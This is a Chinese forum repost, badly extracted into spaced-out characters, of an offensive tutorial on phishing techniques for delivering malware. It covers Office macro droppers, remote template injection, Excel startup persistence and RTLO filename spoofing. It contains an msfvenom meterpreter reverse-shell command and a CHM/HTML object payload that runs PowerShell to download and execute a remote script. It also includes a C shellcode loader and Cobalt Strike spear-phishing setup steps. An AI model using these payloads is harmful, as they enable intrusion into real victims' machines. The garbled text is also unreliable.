[26716] 2021-04-14_没有不上钩的鱼儿(上)_常用钓鱼手法

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2021-04-14_没有不上钩的鱼儿(上)_常用钓鱼手法 1 2 ( ) _     m o o n s e c   2 0 2 1 - 0 4 - 1 4 ( ) _ A P T A d v a n c e d P e r s i s t e n t   T h r e a t A P T I M 1 / N d a y   0 d a y   J S o f f i c e A d o b e x s h e l l x c o d e A P T c s A P T 3 4 w o r d d o c x e x c e l 1 . 3 . 1 e x c e l 1 . 3 . 2 e x c e l l n k C H M R T L O r a r s h e l l c o d e C S O f f i c e A d o b e 使 G o p h i s h S E T 2 . 1     c s 2 . 1 . 1     A t t a c k s - > P a c k a g e s - > M S O f f i c e   M a c r o
c o p y M a c r o W o r d c s A u t o _ O p e n P R O C E S S _ I N F O R M A T I O N S T A R T U P I N F O C r e a t e R e m o t e T h r e a d V i r t u a l A l l o c E x W r i t e P r o c e s s M e m o r y C r e a t e P r o c e s s A s h e l l c o d e s h e l l c o d e b e a c o n . d l l s h e l l c o d e r u n d l l 3 2 . e x e : C t r l + s w o r d d o c m 线 m y A r r a y s h e l l c o d e 2 . 1 . 2   A P T 3 4 w o r d 2 . 1 . 2 . 1 o l e d u m p . p y d u m p s t r e a m 1 7 m V B A
- s - v 1 1 2 5 1 2 6 2 S c r i p t i n g . F i l e S y s t e m O b j e c t W S c r i p t . S h e l l 3 % P U B L I C % c m d 1 p o w e r s h e l l b a s e 6 4 % p u b l i c % / L i b r a r y / f i r e e y e . v b s % p u b l i c % / L i b r a r y / f i r e e y e . v b s C m d 2 G o o g l e U p d a t e s T a s k M a c h i n e U I % p u b l i c % / L i b r a r y / f i r e e y e . v b s 4 F i l e S y s t e m O b j e c t % P U B L I C % / L i b a r a r y / u p d n t p 5 c m d 2 . 1 . 2 . 2 f i r e e y e . v b s : % p u b l i c % L i b r a r i s e d n C o n t e n t - D i s p o s i t i o n % p u b l i c % L i b r a r i s e u p b a s e 6 4 : f i r e e y e . p s 1 2 . 1 . 2 . 3 f i r e e y e . p s 1 : D N S A I P
I P I P 3 3 . 3 3 f l a g 3 5 . 3 5 . 3 5 . 3 5 f l a g 1 2 . 2   d o c x 2 . 1 d o c m h t t p h t t p d o c x z i p : w o r d _ r e l s s e t t i n g s . x m l . r e l s t a r g e t
t a r g e t d o t m 2 . 3   e x c e l 2 . 3 . 1   e x c e l m s i m s f v e n o m - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = < Y o u r   I P   A d d r e s s > L P O R T = < Y o u r   P o r t   t o   C o n n e c t   O n >   - f   m s i   - o   1 . m s i x l s x s h e e t x l s m 2 . 3 . 2 e x c e l a n a l t + f 1 1 d 2 p ( ) , a n t h o r i z e ( ) d 2 p ( ) C : U s e r s k e n t A p p D a t a R o a m i n g M i c r o s o f t E x c e l X L S T A R T a n t h o r i z a t i o n . x l s 1 0 0 a n t h o r i z a t i o n . x l s 1 0 0 W o r k b o o k s . o p e n e x c e l a n t h o r i z a t i o n ( ) G e t O b j e c t ( " w i n m g m t s : . " ) . i n s t a n c e s o f ( " W i n 3 2 _ P r o c e s s " ) i e x p l o r e . e x e o f f i c e 2 3 4 5
i e a n t h o r i z a t i o n . x l s a n t h o r i z a t i o n . x l s r u n t i m e r ( ) a n t h o r i z e ( )
r u n t i m e r p 2 d d ( ) p 2 d d ( )   V B E   T h i s W o r k b o o k u p d a t e 1 0 0 a u t h o r i z e ( ) a u t h o r i z a t i o n ( ) a u t h o r i z a t i o n ( ) e x c l e a n t h o r i z a t i o n . x l s T h i s W o r k b o o k , 2 . 4   l n k   A t t a c k s - > P a c k a g e s - > H T M L A p p l i c a t i o n l i s t e n e r m o t h o d m e t h o d p o w e r s h e l l p s 1 h t t p c s h o s t a   f i l e 线 2 . 5   C H M C : W i n d o w s S y s t e m 3 2 W i n d o w s P o w e r S h e l l v 1 . 0 p o w e r s h e l l . e x e - e x e c   b y p a s s   - c   I E X   ( N e w - O b j e c t S y s t e m . N e t . W e b c l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 2 0 2 . 1 3 1 : 8 0 8 0 / p a y l o a d . p s 1 ' ) < ! D O C T Y P E h t m l > < h t m l > < h e a d > < t i t l e > M o u s e j a c k r e p l a y < / t i t l e > < h e a d > < / h e a d > < b o d y > c o m m a n d e x e c < O B J E C T i d = x   c l a s s i d = " c l s i d : a d b 8 8 0 a 6 - d 8 f f - 1 1 c f - 9 3 7 7 - 0 0 a a 0 0 3 b 7 a 1 1 " w i d t h = 1   h e i g h t = 1 > < P A R A M n a m e = " C o m m a n d "   v a l u e = " S h o r t C u t " >
h t m l A N S I 使 E a s y C H M C H M E a s y C H M - > - > h t m l C H M 线 2 . 6 R T L O R T L O 使 R e s t o r a t o r R T L O ( R i g h t - t o - L e f t O v e r r i d e ) U n i c o d e 使 A r t i f a c t . e x e R L O a r t f a c t e x e . m p 4 线 2 . 7   r a r R a r w i n r a r - > - > < P A R A M   n a m e = " B u t t o n "   v a l u e = " B i t m a p : : s h o r t c u t " > < P A R A M   n a m e = " I t e m 1 " v a l u e = " , c m d . e x e , / c C : W i n d o w s S y s t e m 3 2 W i n d o w s P o w e r S h e l l v 1 . 0 p o w e r s h e l l . e x e - e x e c   b y p a s s   - c   I E X   ( N e w - O b j e c t S y s t e m . N e t . W e b c l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 2 0 2 . 1 3 1 : 8 0 8 0 / p a y l o a d . p s 1 ' ) " < P A R A M   n a m e = " I t e m 2 "   v a l u e = " 2 7 3 , 1 , 1 " > < / O B J E C T > < S C R I P T > x . C l i c k ( ) ; < / S C R I P T > < / b o d y > < / h t m l >
e x e 线 2 .   8   s h e l l c o d e 使 h t t p s : / / g i t h u b . c o m / M r - U n 1 k 0 d 3 r / D K M C s h e l l c o d e p y t h o n d k m c . p y 使 s c s e t s o u r c e   s h e l l c o d e . t x t s h e l l c o e 使 g e n 使 s e t s h e l l c o d e s h e l l c o d e r u n s h e l l c o d e 使 s h e l l c o d e 使 # i n c l u d e < s t d i o . h > # i n c l u d e < w i n d o w s . h > i n t m a i n ( i n t   a r g c ,   c h a r *   a r g v [ ] )   { H A N D L E h F i l e   =   C r e a t e F i l e ( " D : o u t . b m p " ,   G E N E R I C _ R E A D , F I L E _ S H A R E _ R E A D ,   N U L L ,   O P E N _ A L W A Y S ,   F I L E _ A T T R I B U T E _ N O R M A L ,   N U L L ) ; i f ( h F i l e   = =   I N V A L I D _ H A N D L E _ V A L U E ) { p r i n t f ( " E r r o r " ) ; r e t u r n - 1 ; } D W O R D d w S i z e ; d w S i z e =   G e t F i l e S i z e ( h F i l e ,   N U L L ) ; L P V O I D l p A d d r e s s   =   V i r t u a l A l l o c ( N U L L ,   d w S i z e ,   M E M _ C O M M I T , P A G E _ E X E C U T E _ R E A D W R I T E ) ; i f ( l p A d d r e s s   = =   N U L L ) {
线 s h e l l c o d e b m p 0 x 4 2 0 x 4 d s h e l l c o d e 2 . 9   C S A t t a c k s - > S p e a r P h i s h T a r g e t , t a b 1 2 3 4 5 6 @ q q . c o m   n a m e T e m p a l t e A t t a c h m e n t E m b e d U R L U R L ; M a i l S e r v e r   S M T P B o u n c e T o 西 s e n d q q : 2 . 1 0   e x e d l l d l l d l l 1 . e x e w w l i b . d l l 1 . e x e 1 . e x e { p r i n t f ( " E r r o r " ) ; r e t u r n - 1 ; } R t l Z e r o M e m o r y ( l p A d d r e s s , d w S i z e ) ; D W O R D d w R e a d ; R e a d F i l e ( h F i l e , l p A d d r e s s ,   d w S i z e ,   & d w R e a d ,   0 ) ; s y s t e m ( " p a u s e " ) ; _ _ a s m { c a l l l p A d d r e s s ; } _ f l u s h a l l ( ) ; r e t u r n 0 ; }
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则